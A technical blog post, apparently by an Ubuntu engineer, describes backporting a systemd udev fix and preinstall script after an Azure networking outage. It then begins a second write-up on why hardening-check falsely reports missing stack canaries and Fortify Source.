We check a instead of r, and we change log_device_debug to a plain log_debug, and manually supply the device using udev_device_get_sysname(device). We also re-use Dan Streetman’s idea of *name = old_name and return 0.

For the second hunk, we do something similar:

The original hunk:

@@ -620,9 +636,17 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
         if (r < 0)
                 return r;
 
-        r = link_config_generate_new_name(ctx, config, device, &new_name);
-        if (r < 0)
-                return r;
+        if (a == DEVICE_ACTION_MOVE) {
+                log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+
+                r = sd_device_get_sysname(device, &new_name);
+                if (r < 0)
+                        return log_device_error_errno(device, r, "Failed to get sysname: %m");
+        } else {
+                r = link_config_generate_new_name(ctx, config, device, &new_name);
+                if (r < 0)
+                        return r;
+        }
 
         r = link_config_apply_alternative_names(&ctx->rtnl, config, device, new_name);
         if (r < 0)

Dan Streetman’s backport for Focal:

@@ -421,6 +433,12 @@ int link_config_apply(link_config_ctx *c
                 goto no_rename;
         }
 
+        if (a == DEVICE_ACTION_MOVE) {
+                log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+                new_name = old_name;
+                goto no_rename;
+        }
+
         if (ctx->enable_name_policy && config->name_policy)
                 for (NamePolicy *p = config->name_policy; *p != _NAMEPOLICY_INVALID; p++) {
                         policy = *p;

and what I came up with:

@@ -413,6 +426,13 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
                 return -ENODEV;
         }
 
+        if (a == DEVICE_ACTION_MOVE) {
+                log_debug("Skipping to apply Name= and NamePolicy= on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+                *name = old_name;
+                return 0;
+        }
+
         if (ctx->enable_name_policy && config->name_policy) {
                 NamePolicy *policy;
 

We keep the same sort of structure as Dan Streetman, but since no_rename label does not exist, we simply return 0 early.

and thus, we have the final patch:

From e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151 Mon Sep 17 00:00:00 2001
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: [PATCH] udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=,
 ID_NET_NAME= properties on non-'add' uevent
Bug: https://github.com/systemd/systemd/issues/17532
Bug-Ubuntu: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1988119
Origin: upstream, https://github.com/systemd/systemd/commit/e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151

Previous commit makes drop ID_NET_DRIVER=, ID_NET_LINK_FILE=, and
ID_NET_NAME= properties for network interfaces on 'move' uevent.
ID_NET_DRIVER= and ID_NET_LINK_FILE= properties are used by networkctl.
ID_NET_NAME= may be used by end-user rules or programs. So, let's
re-assign them on 'move' uevent. (Note that strictly speaking, this
makes them re-assigned on all but 'remove' uevent.)
---
NOTE: backported from upstream, to keep as much backwards compatibility as possible;
specifically 1) don't return failure if device_get_action() fails, and 2) context
adjustments since the upstream commit builds on splitting out the function
action into separate functions, which our code doesn't include.
 rules/80-net-setup-link.rules |  2 +-
 src/udev/net/link-config.c    | 20 ++++++++++++++++++++
 2 files changed, 21 insertions(+), 1 deletion(-)

diff --git a/rules/80-net-setup-link.rules b/rules/80-net-setup-link.rules
index 6e411a9..bafc3fb 100644
--- a/rules/80-net-setup-link.rules
+++ b/rules/80-net-setup-link.rules
@@ -4,7 +4,7 @@ SUBSYSTEM!="net", GOTO="net_setup_link_end"
 
 IMPORT{builtin}="path_id"
 
-ACTION!="add", GOTO="net_setup_link_end"
+ACTION=="remove", GOTO="net_setup_link_end"
 
 IMPORT{builtin}="net_setup_link"
 
diff --git a/src/udev/net/link-config.c b/src/udev/net/link-config.c
index a4368f0..4c7e87d 100644
--- a/src/udev/net/link-config.c
+++ b/src/udev/net/link-config.c
@@ -25,6 +25,8 @@
 #include "alloc-util.h"
 #include "conf-files.h"
 #include "conf-parser.h"
+#include "device-private.h"
+#include "device-internal.h"
 #include "ethtool-util.h"
 #include "fd-util.h"
 #include "libudev-private.h"
@@ -371,6 +373,7 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
         struct ether_addr *mac = NULL;
         const char *new_name = NULL;
         const char *old_name;
+        DeviceAction a = _DEVICE_ACTION_INVALID;
         unsigned speed;
         int r, ifindex;
 
@@ -383,6 +386,16 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
         if (!old_name)
                 return -EINVAL;
 
+        a = device_action_from_string(udev_device_get_action(device));
+        if (a < 0)
+                log_warning_errno(errno, "Failed to get ACTION= property: %m");
+        else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+                log_debug("Skipping to apply .link settings on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+                *name = old_name;
+                return 0;
+        }
+
         r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name, config);
         if (r < 0) {
 
@@ -413,6 +426,13 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
                 return -ENODEV;
         }
 
+        if (a == DEVICE_ACTION_MOVE) {
+                log_debug("Skipping to apply Name= and NamePolicy= on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+                *name = old_name;
+                return 0;
+        }
+
         if (ctx->enable_name_policy && config->name_policy) {
                 NamePolicy *policy;
 
-- 
2.34.1

I quickly got a test package building in a ppa, and eagerly attempted to reproduce the issue:

$ sudo udevadm trigger && sudo systemctl restart systemd-networkd
$ ping google.com
PING google.com (172.253.122.138) 56(84) bytes of data.
64 bytes from bh-in-f138.1e100.net (172.253.122.138): icmp_seq=1 ttl=103 time=1.67 ms

I was relieved. The fix worked as intended, and we fixed the bug. I then created a proper debdiff, and uploaded it to the Launchpad bug as systemd 237-3ubuntu10.55.

debdiff for systemd 237-3ubuntu10.55

systemd (237-3ubuntu10.55) bionic; urgency=medium

  * d/p/lp1988119-udev-re-assign-ID_NET_DRIVER-ID_NET_LINK_FILE-ID_NET.patch:
    Run net_setup_link on 'change' uevents, important for users of the
    hv_netvsc driver on Azure. (LP: #1988119)

 -- Matthew Ruffell <matthew.ruffell@canonical.com>  Wed, 31 Aug 2022 16:35:20 +1200

With a full SRU template on the Launchpad bug description, this was ready to go.

SRU template

I message Nishit on Mattermost, and we got this built, and placed into the ubuntu-security-proposed ppa, since this was going through -security, and not -updates.

By the time the package hit ubuntu-security-proposed, we are about 8 hours into my day, and since the issue was no longer absolutely critical, I decided to err on the side of caution and ask Microsoft Azure engineers for a review and signoff of the packages in -proposed.

Looking back, this decision to wait for stakeholder signoff before release was one of the most important decisions in this whole case.

udev Preinstall Script

Microsoft got back the next morning, mentioning that the fix works as intended, works great, and is robust.

But.

Well, the fix is only robust on systems that have been rebooted, or are non primed. That is, systems that haven’t lost ID_NET_DRIVER or have recovered it already.

If a system had already lost ID_NET_DRIVER, for example, by installing open-vm-tools and not yet installing the benign systemd security update, the failure would still occur.

If we had rushed and released systemd 237-3ubuntu10.55 as it was, it would have likely taken Bionic VMs running on Azure down for a second time.

So, we needed a plan to fix all the machines that are currently ‘primed’. Microsoft suggested a preinstall script like the following:

pushd /sys/class/net
for i in *; do
  echo -n "Checking $i: "
  if ! (udevadm info /sys/class/net/$i | grep ID_NET_DRIVER); then
    echo "executing trigger on link $i to add ID_NET_DRIVER."
    udevadm trigger -c add -y $i
  fi
done
popd

What it did was for every network device, grep for ID_NET_DRIVER, and if it is missing, issue a ADD uevent to the device.

This would certainly fix the issue, but I was initially very concerned about running this script on not just every single VM running on Azure, but the whole cohort, from bare metal to KVM VMs to Virtualbox to AWS to GCP to Oracle cloud. I was quite anxious at the thought, since I didn’t know if issuing a bunch of ADD uevents to every Bionic machine in the wild would cause any additional problems, or a regression.

Instead, I wanted to add a much safer, more targeted fix, of a udev rule, like the following:

/etc/udev/rules.d/67-azure-network.rules:
SUBSYSTEM=="net", SUBSYSTEMS=="vmbus", DRIVERS=="hv_netvsc", ENV{ID_NET_DRIVER}="hv_netvsc"

This would directly target Azure VMs only, and it would directly target hv_netvsc devices. I suggested we stick this in the walinuxagent package, but there were additional issues such as needing to call udevadm control --reload-rules && udevadm trigger to make the rule apply, so we would need to add that in, or make upgrading the udev package add this in.

This causes further problems since we would force reload all rules during an upgrade and apply them, causing the event that caused the issue in the first place, and it would override manually changed udev rules with system file rules, which could create problems for some running systems.

There were also other problems with the udev rule, such as only replacing ID_NET_DRIVER when we had also lost additional attributes, and the udev rule would then have to persist forever.

After discussing this with Microsoft engineers, we all decided that the preinstall script was the best way forward.

I wrote up a proof of concept to ensure it only gets called once, on upgrade from any package below systemd 237-3ubuntu10.56, so we only have one upgrade where we worry about regression risk for ADD uevents. I wrapped it in a function, and made sure we return true at the call to the ADD uevent.

diff -Nru systemd-237/debian/udev.preinst systemd-237/debian/udev.preinst
--- systemd-237/debian/udev.preinst	2021-12-10 22:15:07.000000000 +1300
+++ systemd-237/debian/udev.preinst	2022-09-06 15:18:05.000000000 +1200
@@ -55,6 +55,17 @@
   fi
 }
 
+check_ID_NET_DRIVER() {
+  # Ensure ID_NET_DRIVER is set on Network interfaces LP: #1988119
+  for i in $(ls /sys/class/net); do
+    echo -n "Checking $i: "
+    if ! (udevadm info /sys/class/net/$i | grep ID_NET_DRIVER); then
+      echo "Executing trigger on link $i to add ID_NET_DRIVER."
+      udevadm trigger -c add -y $i || true
+    fi
+  done
+}
+
 check_version() {
   # $2 is non-empty when installing from the "config-files" state
   [ -n "$2" ] || return 0
@@ -70,6 +81,10 @@
       udevadm control --log-priority=0 || true
     fi
   fi # 204-4
+
+  if dpkg --compare-versions $2 lt 237-3ubuntu10.56; then
+    check_ID_NET_DRIVER  
+  fi # 237-3ubuntu10.56  
 }
 
 case "$1" in

This worked great in a test package. It did generate a bit of output though:

Preparing to unpack .../udev_237-3ubuntu10.55+sf343528v20220906b3_amd64.deb ...
Checking enP50633s1: Executing trigger on link enP50633s1 to add ID_NET_DRIVER.
Checking eth0: Executing trigger on link eth0 to add ID_NET_DRIVER.
Checking lo: Executing trigger on link lo to add ID_NET_DRIVER.
Unpacking udev (237-3ubuntu10.55+sf343528v20220906b3) over (237-3ubuntu10.53) ...

Checking the package upgrade on an already primed system:

$ udevadm info /sys/class/net/eth0 | grep ID_NET_DRIVER
E: ID_NET_DRIVER=hv_netvsc
$ sudo udevadm trigger
$ udevadm info /sys/class/net/eth0 | grep ID_NET_DRIVER
$ sudo apt update
$ sudo apt install libnss-systemd libpam-systemd libsystemd0 libudev1 systemd systemd-sysv udev
$ udevadm info /sys/class/net/eth0 | grep ID_NET_DRIVER
E: ID_NET_DRIVER=hv_netvsc
$ ping google.com
PING google.com (172.253.122.138) 56(84) bytes of data.
64 bytes from bh-in-f138.1e100.net (172.253.122.138): icmp_seq=1 ttl=103 time=1.67 ms

At this point, I was quite worried about the impact of issuing a ADD uevent on all Bionic systems, so I made my second best decision in this case:

Asking for help.

I wrote an email to the Foundations, Server, Security, and Sustaining Engineering teams, explaining the root cause, minimal reproducer, the choice not to go with a udev rule, and instead the preinstall script.

I asked for any and all advice on issuing ADD uevents on a mass scale, to code review of the preinstall script, and general approach.

I got several replies.

The first, was from Christian Ehrhardt, of the Server team, who over the years, I have asked for help a few times, and always received well thought out and expert advice.

Christian pointed out that:

+  for i in $(ls /sys/class/net); do
+    echo -n "Checking $i: "

will be too noisy. His own laptop had 17 entries, and since every bridge, veth, and vpn will also be there, larger servers could very well have hundreds of entries. Christian suggested that we log once that devices are re-probed, and then log to a file with logger for each device that actually gets modified.

Christian also suggested to use udevadm settle to avoid any potential thunderstorms on larger, busier servers when we call udevadm trigger -c add in rapid succession.

Christian also suggested that /sys/class/net/lo will not have a driver, and can skipped being re-added.

Next, Alex Murray, from the Security Team wrote back, and suggested we use a glob instead of ls to get devices, and also omit lo like so:

   for i in /sys/class/net/[!lo]*; do

Finally, my colleage Mauricio Oliveira chimed in, and offered some thought provoking advice on the benefits and pitfalls of using ADD uevents instead of CHANGE.

I took everyone’s advice on board, and pondered the more theoretical problems that had been raised. The result from everyone’s feedback and a bit more tweaking is the final debdiff for systemd 237-3ubuntu10.56:

debdiff for systemd 237-3ubuntu10.56

diff -Nru systemd-237/debian/changelog systemd-237/debian/changelog
--- systemd-237/debian/changelog	2022-08-31 16:35:20.000000000 +1200
+++ systemd-237/debian/changelog	2022-09-06 15:18:05.000000000 +1200
@@ -1,3 +1,12 @@
+systemd (237-3ubuntu10.56) bionic; urgency=medium
+
+  * debian/udev.preinst:
+    Add check_ID_NET_DRIVER() to ensure that on upgrade or install
+    from an earlier version ID_NET_DRIVER is present on network
+    interfaces. (LP: #1988119)
+
+ -- Matthew Ruffell <matthew.ruffell@canonical.com>  Tue, 06 Sep 2022 15:18:05 +1200
+
 systemd (237-3ubuntu10.55) bionic; urgency=medium
 
   * d/p/lp1988119-udev-re-assign-ID_NET_DRIVER-ID_NET_LINK_FILE-ID_NET.patch:
diff -Nru systemd-237/debian/udev.preinst systemd-237/debian/udev.preinst
--- systemd-237/debian/udev.preinst	2021-12-10 22:15:07.000000000 +1300
+++ systemd-237/debian/udev.preinst	2022-09-06 15:18:05.000000000 +1200
@@ -55,6 +55,17 @@
   fi
 }
 
+check_ID_NET_DRIVER() {
+  # Ensure ID_NET_DRIVER is set on Network interfaces LP: #1988119
+  for i in /sys/class/net/[!lo]*; do
+    if ! (udevadm info $i | grep --silent ID_NET_DRIVER); then
+      logger --id=$$ --priority=user.info "udev.preinst: Executing trigger on link $(basename $i) to add ID_NET_DRIVER."
+      udevadm trigger -c add -y $(basename $i) || true
+    fi
+  done
+  udevadm settle || true
+}
+
 check_version() {
   # $2 is non-empty when installing from the "config-files" state
   [ -n "$2" ] || return 0
@@ -70,6 +81,10 @@
       udevadm control --log-priority=0 || true
     fi
   fi # 204-4
+
+  if dpkg --compare-versions $2 lt 237-3ubuntu10.56; then
+    check_ID_NET_DRIVER  
+  fi # 237-3ubuntu10.56  
 }
 
 case "$1" in

This was then built and uploaded to the ubuntu-security-proposed ppa, and I again tested it on Azure, and it worked like a charm.

From there, I submitted the package to Microsoft for validation from their engineers, and while I was waiting, began testing systemd 237-3ubuntu10.56 in every way imaginable.

The next day we got the okay from Microsoft, and we agreed on a release date for the package, Tuesday 14th September APAC time.

The current day was Saturday, and I was working the APAC weekend shift, and I began testing the package on bare metal, KVM, Xen, AWS, GCP, Azure, with as many quirks and oddities that I could imagine.

The package was also subjected to the automated autopkgtests on our internal infrastructure, and passed all tests.

When Tuesday came around, it was time to follow through and release the update. Even after spending my entire weekend shift testing, I was still a little anxious, due to the nature of the changes involved, the overall risk of regression and the impact a regression could have.

Since the package was being released to -security, unattended-upgrades will install the package as soon as it sees it, and if I had made any mistake at all, at minimum we were looking at causing another complete outage on Azure, and worst case, bringing down every Bionic system.

In the end, the update went out smoothly. The preinstall script successfully fixed up primed machines, and the permanent fix to the systemd codebase was correct and true, preventing the issue from happening again.

The update was released without any fanfare, with no media coverage, and I couldn’t have been any happier.

Aftermath

A few noteworthy things happened after the update was released.

Azure Post Incident Writeup

Microsoft Azure has written up their own Post Incident Review (PIR), which you can find on the Azure Status website:

Azure Status History

Make sure you click the “all” setting for timescale, and search for the terms:

Post Incident Review (PIR) - Canonical Ubuntu issue impacted VMs and AKS (Tracking ID 2TWN-VT0)

I can’t seem to find a dedicated link. Regardless, they talk about the need for extra testing and validation, something we will work towards in the near future.

open-vm-tools

You might be wondering what happened to open-vm-tools, since it started this whole chain of events.

It turns out, there was a bug already open to limit the scope of udevadm trigger to just the scsi subsystem, since it was only needed there and nowhere else:

LP1968354 Please do not run udevadm trigger without parameters

This change had been put on hold due to it being low priority, and a one line fix, and typically we would hold off on these types of updates to reduce churn, and instead, pair it up with another SRU and piggyback on it instead.

But due to the high profile of the outage it caused, it was fixed shortly after the systemd package was released.

diff --git a/debian/changelog b/debian/changelog
index 0bfea9a..b8f3ae7 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,11 @@
+open-vm-tools (2:11.0.5-4ubuntu0.18.04.3) bionic; urgency=medium
+
+  * d/open-vm-tools.postinst: Fixes issue with "udevadm trigger"
+    affecting all devices that can cause unwanted side-effects.
+    (LP: #1968354)
+
+ -- Bryce Harrington <bryce@canonical.com>  Mon, 19 Sep 2022 22:14:07 +0000
+
 open-vm-tools (2:11.0.5-4ubuntu0.18.04.2) bionic-security; urgency=medium
 
   * SECURITY UPDATE: local privilege escalation
diff --git a/debian/open-vm-tools.postinst b/debian/open-vm-tools.postinst
index f181ab2..aa224fb 100644
--- a/debian/open-vm-tools.postinst
+++ b/debian/open-vm-tools.postinst
@@ -5,7 +5,7 @@ set -e
 case "${1}" in
     configure)
         if which udevadm 1>/dev/null; then
-            udevadm trigger || true
+            udevadm trigger --type=devices --subsystem-match=scsi || true
         fi
         ;;

From the debdiff, we see it has been changed to udevadm trigger --type=devices --subsystem-match=scsi in version 2:11.0.5-4ubuntu0.18.04.3. Hopefully it will be an extra step to make sure something like this doesn’t happen again on the next open-vm-tools SRU.

Ubuntu Security Podcast

A few days after the update was released, Alex Murray reached out and suggested we have a debrief on the Ubuntu Security Podcast, where we talk about the regression, what happened, how we worked to solve the issue, and give a brief idea of how we tested and validated the fix.

Nishit spoke as well, and I enjoyed having the opportunity to be on the podcast. Maybe I should make another appearance sometime.

Listen to Episode 177 of the Ubuntu Security Podcast

Lessons Learned

I think the key takeaways of this outage is the following:

Keep calm, and think logically during an outage, even when the world is watching.
Never rush to deliver a fix, instead test and aim to get stakeholder signoff before release. They might think of something that you haven’t.
Ask for help from your immediate colleagues and across teams when you need it, it is not a sign of weakness, but a desire to deliver the best fix possible, the first time, and having advice from world class engineers drives you toward that goal, especially when you are under pressure.

Conclusion

Well, I hope you enjoyed the deep dive into the interesting, and very strange case of a complex interaction between two packages causing a cloud wide outage.

It is not often that two packages interacting causes issues, most bugs are caused within the package itself. But in this case, open-vm-tools primed the systems just enough to bring a dormant systemd bug to the surface, over 4.5 years after initial release of Bionic.

We covered how we came up with the minimal reproducer, analysed the systemd bug, and how we backported the fix, how we did not rush to put out a fix, and saved us from another cloud wide outage as a result, to working together and valuing everyone’s input to develop a successful preinstall script to fix already primed systems, to delivering the fix worldwide.

Hopefully you enjoyed the read, and as always feel free to contact me.

Matthew Ruffell

Investigating Missing Stack Canaries and Fortify Source on Binaries

2022-06-10T00:00:00+00:00

Not too long ago, I worked on a fairly interesting case where a user claimed that many of the binaries on their system were missing Stack Canaries provided through -fstack-protector-strong and additionally, many were missing Fortify Source being enabled through -D_FORTIFY_SOURCE=2.

This is most unusual, since these compiler flags, along with many others, are enabled by default for all packages in the Ubuntu archive.

So in this writeup, we are going to investigate this user’s claims, and try get to the bottom of the mystery of the missing compiler hardening options in binaries from the Ubuntu archive. Stay tuned.

What Even are Stack Canaries and Fortify Source?

We are referring to a set of compiler flags that GCC and LLVM support in regard to applying security hardening features to binaries at compile time, so that they might be able to detect mischief at runtime. These flags are designed to be implemented in any program, and the programmer doesn’t need to know they are there for them to work.

Stack Canaries

Stack Canaries provide a basic check to see if a buffer overflow has occurred before we return from a function call, by popping the return address off the stack and using it as the next instruction pointer to be executed.

If we add a “canary” at compile time, which is just a random number placed at the end of the stack, when we go to return from the function, we test the number on the stack versus what we expect it to be, and if it matches, it is likely no buffer overflow has occurred, and we return. If it fails, we call a function __stack_chk_fail which prints the below error, and kills the process, since it is very likely something has overflowed the stack frame and it could be an attacker trying to redirect the flow of execution to elsewhere in the program.

The error:

*** stack smashing detected ***
Aborted

Fortify Source

Fortify Source builds on the idea of Stack Canaries, by adding a few more checks to various functions to see if a buffer overflow has occurred. It instruments functions like memcpy, strcat and strncpy and adds things like extra length checks, checks flags for various buffers that have been allocated, that sort of thing.

The compiler transparently replaces calls to normal memcpy etc with those of the form __memcpy_chk.

The Problem

The user opened a case, and provided a big list of binaries that seem to be missing Stack Canaries, and Fortify Source protections, and didn’t offer much more information. I already suspect that the user is running some sort of automated testing tool over their system, and this was just the output.

For example, lets look at a freshly debootstrapped Jammy system:

Binaries missing Stack Canaries:
/usr/bin/clear
/usr/bin/dbus-uuidgen
/usr/bin/free
/usr/bin/getconf
/usr/bin/locale-check
/usr/bin/rev
/usr/bin/tabs
/usr/bin/tempfile
/usr/bin/xxd
/usr/sbin/findfs
/usr/sbin/fstab-decode
/usr/sbin/ldconfig.real
/usr/sbin/mklost+found
/usr/sbin/nologin
/usr/sbin/pivot_root
/usr/sbin/setcap
/usr/sbin/vcstime

Binaries missing Fortify Source:
/usr/bin/apt
/usr/bin/apt-cdrom
/usr/bin/apt-config
/usr/bin/apt-extracttemplates
/usr/bin/apt-get
/usr/bin/apt-mark
/usr/bin/apt-sortpkgs
/usr/bin/getconf
/usr/bin/getent
/usr/bin/iconv
/usr/bin/ischroot
/usr/bin/locale
/usr/bin/localedef
/usr/bin/pldd
/usr/bin/update-mime-database
/usr/bin/zdump
/usr/sbin/dmsetup
/usr/sbin/dmstats
/usr/sbin/iconvconfig
/usr/sbin/ldconfig.real
/usr/sbin/zic

The actual output was quite a bit longer, and more like the following list, taken from a fresh Jammy Server VM with devscripts installed:

Example output from a system with more packages.

I was quite surprised at the amount of binaries which claim to have no Stack Canaries present, and are also missing Fortify Sources protections. I thought that this has to be a mistake, since these protections are enabled for all packages by default.

Compiler Flags Set in Ubuntu by Default

If you are ever wondering what compiler flags your binaries are built with by default in the Ubuntu archive, have a read of the CompilerFlags wiki page.

Stack Canaries

Reading the wiki page, -fstack-protector has been enabled for all packages by default since Ubuntu 6.10, and was extended to include greater coverage in more binaries being built with the stack protector with --param ssp-buffer-size=4 by default in 10.10.

Currently -fstack-protector-strong is the default compiler flag, and this has been enabled for all packages since 14.10.

Fortify Source

The wiki mentions -D_FORTIFY_SOURCE=2 has been enabled for all packages since 8.10, which is a really long time. It does only apply to packages built with -O1 optimisation or higher, but I would expect the amount of packages not using -O2 or higher to be very low.

So why do we have so many binaries which claim to be missing these protections?

Manual Checking

A good quick way to check a binary is to examine the build log, and see if it includes the compiler flags when the object file is being built.

Stack Canaries

Lets take the first item off the list for missing Stack Canaries, /usr/bin/clear.

/usr/bin/clear is part of the ncurses-bin package:

$ apt-file search /usr/bin/clear
ncurses-bin: /usr/bin/clear

We can look this package up on Launchpad, ncurses 6.3-2 and from there find the build for Jammy and then we can examine the buildlog for Jammy

Eventually, we find where it is compiled:

gcc -DHAVE_CONFIG_H -I../progs -I. -I../../progs -I../include -I../../progs/../include
 -Wdate-time -D_FORTIFY_SOURCE=2 -D_DEFAULT_SOURCE -D_XOPEN_SOURCE=600 -DNDEBUG 
 -g -O2 -ffile-prefix-map=/<<PKGBUILDDIR>>=. -flto=auto -ffat-lto-objects -flto=auto
 -ffat-lto-objects -fstack-protector-strong -Wformat --param max-inline-insns-single=1200 
 -Werror=format-security -fPIC -c ../../progs/clear.c -o ../obj_s/clear.o

It very clearly has -fstack-protector-strong enabled. This is a false positive.

Fortify Source

Again, lets take the first item off the list for missing Fortify Source, /usr/bin/apt. This is obviously part of the apt package, so let’s find apt on launchpad, and next the build for Jammy and then the buildlog for Jammy.

After looking for a long time, we come across:

[103/1085] : && /usr/bin/c++ -g -O2 -ffile-prefix-map=/<<PKGBUILDDIR>>=. -flto=auto
 -ffat-lto-objects -flto=auto -ffat-lto-objects -fstack-protector-strong -Wformat
 -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -Wl,-Bsymbolic-functions 
 -flto=auto -ffat-lto-objects -flto=auto -Wl,-z,relro -Wl,-z,now -Wl,--as-needed 
 cmdline/CMakeFiles/apt.dir/apt.cc.o -o cmdline/apt  -Wl,
 -rpath,/<<PKGBUILDDIR>>/obj-x86_64-linux-gnu/apt-private:/<<PKGBUILDDIR>>/obj-x86_64-linux-gnu/apt-pkg:  
 apt-private/libapt-private.so.0.0.0  apt-pkg/libapt-pkg.so.6.0.0 && :

This also very clearly has -D_FORTIFY_SOURCE=2 enabled. Another false positive.

Automated Scanning Tools

So, now we are beginning to suspect that whatever automated scanning tool was being used is missing information and is not able to determine if these compiler flags have been enabled or not.

Now we just need to find a tool and see how it works, so we can investigate its shortcomings.

I came across the upstream debian hardening webpage, and found the validation section particularly interesting.

It suggested running “hardening-check” from the devscripts package, so I tried that for a known good binary, such as /usr/bin/ls:

$ hardening-check /usr/bin/ls
/usr/bin/ls:
 Position Independent Executable: yes
 Stack protected: yes
 Fortify Source functions: yes (some protected functions found)
 Read-only relocations: yes
 Immediate binding: yes
 Stack clash protection: yes
 Control flow integrity: yes

Okay, hardening-check can tell if the stack canary is present, and if fortify source hardened functions are present.

I wrote up a quick script that calls hardening-check, and prints the binaries “missing” Stack Canaries and Fortify Source to the output. This script is how I created the two outputs in “The Problem” section.

BINARIES="/usr/bin/* /usr/sbin/*"
echo "Binaries missing Stack Canaries:"
for f in $BINARIES
do
	hardening-check $f 2> /dev/null | grep "Stack protected" | grep -q "no" && echo $f
done
echo

echo "Binaries missing Fortify Source:"
for f in $BINARIES
do
	hardening-check $f 2> /dev/null | grep "Fortify Source" | grep -q "no" && echo $f
done
echo

Okay, now we have an automated scanning tool of our own, lets dig into how it works.

Investigation

I imagine what hardening-check is doing is dumping the dynamic symbol table from the ELF header, and comparing those functions to hardened ones.

e.g.

$ objdump -T /usr/bin/ls
/usr/bin/ls:     file format elf64-x86-64

DYNAMIC SYMBOL TABLE:
    DF *UND*	00000 (GLIBC_2.3)  __ctype_toupper_loc
    DF *UND*	00000 (GLIBC_2.2.5) getenv
    DO *UND*	00000 (GLIBC_2.2.5) __progname
    DF *UND*	00000 (GLIBC_2.2.5) sigprocmask
    DF *UND*	00000 (GLIBC_2.3.4) __snprintf_chk
    DF *UND*	00000 (GLIBC_2.2.5) raise
    DF *UND*	00000 (GLIBC_2.34) __libc_start_main
    DF *UND*	00000 (GLIBC_2.2.5) abort
    DF *UND*	00000 (GLIBC_2.2.5) __errno_location
    DF *UND*	00000 (GLIBC_2.2.5) strncmp
w   D  *UND*	00000  Base        _ITM_deregisterTMCloneTable
    DO *UND*	00000 (GLIBC_2.2.5) stdout
    DF *UND*	00000 (GLIBC_2.2.5) localtime_r
    DF *UND*	00000 (GLIBC_2.2.5) _exit
    DF *UND*	00000 (GLIBC_2.2.5) strcpy
    DF *UND*	00000 (GLIBC_2.4)  __mbstowcs_chk
    DF *UND*	00000 (GLIBC_2.2.5) __fpending
    DF *UND*	00000 (GLIBC_2.2.5) isatty
    DF *UND*	00000 (GLIBC_2.2.5) sigaction
    DF *UND*	00000 (GLIBC_2.2.5) iswcntrl
    DF *UND*	00000 (GLIBC_2.2.5) wcswidth
    DF *UND*	00000 (GLIBC_2.2.5) localeconv
    DF *UND*	00000 (GLIBC_2.2.5) mbstowcs
    DF *UND*	00000 (GLIBC_2.2.5) readlink
    DF *UND*	00000 (GLIBC_2.17) clock_gettime
    DF *UND*	00000 (GLIBC_2.2.5) setenv
    DF *UND*	00000 (GLIBC_2.2.5) textdomain
    DF *UND*	00000 (GLIBC_2.2.5) fclose
    DO *UND*	00000 (GLIBC_2.2.5) optind
    DF *UND*	00000 (GLIBC_2.2.5) opendir
    DF *UND*	00000 (GLIBC_2.2.5) getpwuid
    DF *UND*	00000 (GLIBC_2.2.5) bindtextdomain
    DF *UND*	00000 (GLIBC_2.2.5) dcgettext
    DF *UND*	00000 (GLIBC_2.2.5) __ctype_get_mb_cur_max
    DF *UND*	00000 (GLIBC_2.2.5) strlen
    DF *UND*	00000 (GLIBC_2.4)  __stack_chk_fail
    DF *UND*	00000 (GLIBC_2.2.5) getopt_long
    DF *UND*	00000 (GLIBC_2.2.5) mbrtowc
    DF *UND*	00000 (LIBSELINUX_1.0) freecon
    DF *UND*	00000 (GLIBC_2.2.5) strchr
    DF *UND*	00000 (GLIBC_2.2.5) getgrgid
    DF *UND*	00000 (GLIBC_2.2.5) snprintf
    DF *UND*	00000 (GLIBC_2.2.5) __overflow
    DF *UND*	00000 (GLIBC_2.2.5) strrchr
    DF *UND*	00000 (GLIBC_2.2.5) gmtime_r
    DF *UND*	00000 (GLIBC_2.2.5) lseek
    DF *UND*	00000 (GLIBC_2.2.5) __assert_fail
    DF *UND*	00000 (GLIBC_2.2.5) fnmatch
    DF *UND*	00000 (GLIBC_2.2.5) memset
    DF *UND*	00000 (GLIBC_2.2.5) ioctl
    DF *UND*	00000 (GLIBC_2.2.5) getcwd
    DF *UND*	00000 (GLIBC_2.2.5) closedir
    DF *UND*	00000 (GLIBC_2.33) lstat
    DF *UND*	00000 (GLIBC_2.2.5) memcmp
    DF *UND*	00000 (GLIBC_2.2.5) _setjmp
    DF *UND*	00000 (GLIBC_2.2.5) fputs_unlocked
    DF *UND*	00000 (GLIBC_2.2.5) calloc
    DF *UND*	00000 (GLIBC_2.2.5) strcmp
    DF *UND*	00000 (GLIBC_2.2.5) signal
    DF *UND*	00000 (GLIBC_2.2.5) dirfd
    DF *UND*	00000 (GLIBC_2.2.5) fputc_unlocked
    DO *UND*	00000 (GLIBC_2.2.5) optarg
    DF *UND*	00000 (GLIBC_2.3.4) __memcpy_chk
    DF *UND*	00000 (GLIBC_2.2.5) sigemptyset
w   D  *UND*	00000  Base        __gmon_start__
    DF *UND*	00000 (GLIBC_2.14) memcpy
    DO *UND*	00000 (GLIBC_2.2.5) program_invocation_name
    DF *UND*	00000 (GLIBC_2.2.5) tzset
    DF *UND*	00000 (GLIBC_2.2.5) fileno
    DF *UND*	00000 (GLIBC_2.2.5) tcgetpgrp
    DF *UND*	00000 (GLIBC_2.2.5) readdir
    DF *UND*	00000 (GLIBC_2.2.5) wcwidth
    DF *UND*	00000 (GLIBC_2.2.5) fflush
